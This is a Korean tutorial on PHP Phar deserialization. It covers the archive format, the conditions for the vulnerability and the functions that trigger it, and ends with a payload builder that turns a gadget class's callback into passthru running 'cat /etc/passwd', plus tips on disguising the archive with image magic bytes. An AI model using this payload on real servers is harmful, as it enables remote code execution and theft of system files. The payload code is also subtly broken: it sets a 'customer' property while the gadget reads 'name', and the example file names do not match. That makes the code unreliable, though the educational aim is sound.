Phar Deserialization

Serialization & Deserialization

• Serialization : 데이터 구조체나 Object 상태의 데이터를 다른 시스템 환경에서도 해석될 수 있도록 Byte Stream 상태로 변환하는 과정
• Deserialization : Byte Stream 상태의 데이터를 데이터 구조체나 Object로 변환하는 과정

Phar (PHP Archive)

Phar는 내부에 실행 가능한 PHP 코드를 모아놓은 아카이브 포맷을 뜻한다. Phar 파일은 아래 4가지의 구조로 이루어진다.

• Stub
• Manifest
• File Contents
• Siganutre (Optional)

[ Stub ]

Stub은 작은 형태의 코드를 담을 수 있는 공간이다. Stub의 마지막 명령어에는 반드시 _HALTCOMPILER()가 포함되어야 한다. Stub을 설정하려면 setStub(string $stub) 함수를 호출하면 된다.

[ Manifest ]

Phar 파일에 대한 MetaData에 대한 부분이다.

[ Phar Manifest file entry ]

Size in bytes     Description
4 bytes         Filename length in bytes
??              Filename (length specified in previous)
4 bytes         Un-compressed file size in bytes
4 bytes         Unix timestamp of file
4 bytes         Compressed file size in bytes
4 bytes         CRC32 checksum of un-compressed file contents
4 bytes         Bit-mapped File-specific flags
4 bytes         Serialized File Meta-data length (0 for none)
??                 **Serialized File Meta-data, stored in serialize() format**

아래 부분에서 가장 마지막 부분이 핵심이다. serialize 함수로 Byte Stream 데이터를 직렬화하게 된다. 이 부분, 즉 Phar Deserialization 취약점은 PHP Wrapper가 Phar 파일을 처리할 때, MetaData가 자동으로 역직렬화되는 부분을 악용한다.

[ File contents and Signature ]

• File Contents : Phar 내 데이터 영역
• Signature : Phar에 대한 시그니처

취약점 조건

• PHP 5.0.0 ~ 7.4 버전에서 가능
• 공격자가 임의의 Phar 파일을 업로드할 수 있어야 함
• 서버 내 코드 중 class에서 __destruct() 혹은 __wakeup()가 정의되어 있어야 함
• 서버가 phar:// Wrapper로 처리 가능해야 함

취약점 상세 설명

아까 말했듯, Manifest의 마지막 부분에 존재하는 serialize()함수를 이용하기 때문에 Deserialization 취약점에 노출된다.

<?php
class TestObject{
    function __destruct()
    {
        echo $this -> data;   
    }
}
include('phar://phar.phar');
?>

TestObject 객체가 있고 __desturct()함수의 data를 보여주게끔 코드가 정의되어 있다.

<?php
    class TestObject {
    }
    $phar = new Phar("test.phar"); 
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); // stub 영역. 
    $content = new TestObject();
    $content -> data='THIS_IS_GUEST';
    $phar->setMetadata($content); // manifest에 데이터를 씁니다. TestObject 객체를 생성해서 값을 채운 후 객체 데이터가 들어갔습니다.
                            // phar 파일의 manifest 영역엔 Serialized된 TestObject 객체가 들어가게 됩니다. 
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
?>

위 코드의 결과 값은 "THIS_IS_GUEST"가 나올 것이다. 예시를 하나 더 들어보자.

<?php
  function goodbye($name) {
      echo "Hello, $name!\n";
  }

  class Customer {
      public $greet = 'goodbye';
      public $name = 'John';
      function __destruct() {
          call_user_func($this->greet, $this->name);
      }
  }
?>

서버 내 코드에 위와 같이 정의되어 있다고 가정하자. 위 코드를 이용해보자. Phar Deserialization 취약점을 트리거하여 특정 파일을 읽는 페이로드는 아래와 같다.

<?php
class Customer {
    public $greet = 'goodbye';
    public $name = 'dream';
    function __destruct() {
        call_user_func($this->greet, $this->name);
    }
}

$phar = new Phar('malicous.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER();?>');

// 특정 확장자만 업로드할 수 있다면아래와 같이 setStub을 구성
// MAGIC BYTES Example: GIF -> GIF89a / JPEG -> \xff\xd8\xff\n
// phar -> php로 변환 후, 확장자도 조건에 맞게 변경해줘야 함
// $phar->setStub('[MAGIC_BYTES]'.'<?php __HALT_COMPILER();?>');

$object = new Customer();
$object->greet = "passthru";
$object->customer = "cat /etc/passwd";

$phar->setMetadata($object);
$phar->stopBuffering();
?>

페이로드를 만드는 원리는 아래와 같다.

1. Customer 클래스가 정의되어 있으므로 phar 파일 내에서도 Customer 클래스를 정의해야 한다.
2. goodbye() 함수 대신 passthru()를 실행 (RCE를 위해서)
3. Customer 클래스 내부의 또 다른 변수인 $name에는 인자를 준다. (인자=명령어)

Phar 처리가 가능한 functions

file()
filetime()
filectime()
fileatime()
file_put_contents()
fileinode()
file_exists()
filegroup()
fileowner()
file_get_contents()
fopen()
fileperms()
is_dir()
is_readable()
is_executable()
is_writable()
is_writeable()
is_file()
is_link()
parse_ini_file()
copy()
unlink()
stat()
readfile()

ETC

이런 툴도 있다고 한다. 링크